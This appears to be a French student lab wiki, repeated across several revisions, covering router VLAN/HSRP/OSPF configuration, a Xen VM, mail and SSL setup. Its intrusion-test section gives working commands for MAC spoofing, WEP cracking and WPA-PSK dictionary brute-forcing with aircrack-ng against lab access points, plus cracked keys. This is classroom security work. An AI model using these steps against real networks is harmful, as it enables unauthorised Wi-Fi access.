<br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23148 TP sysres IMA2a5 2015/2016 G6 2015-11-23T15:21:29Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23147 TP sysres IMA2a5 2015/2016 G6 2015-11-23T15:16:46Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>Network</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> 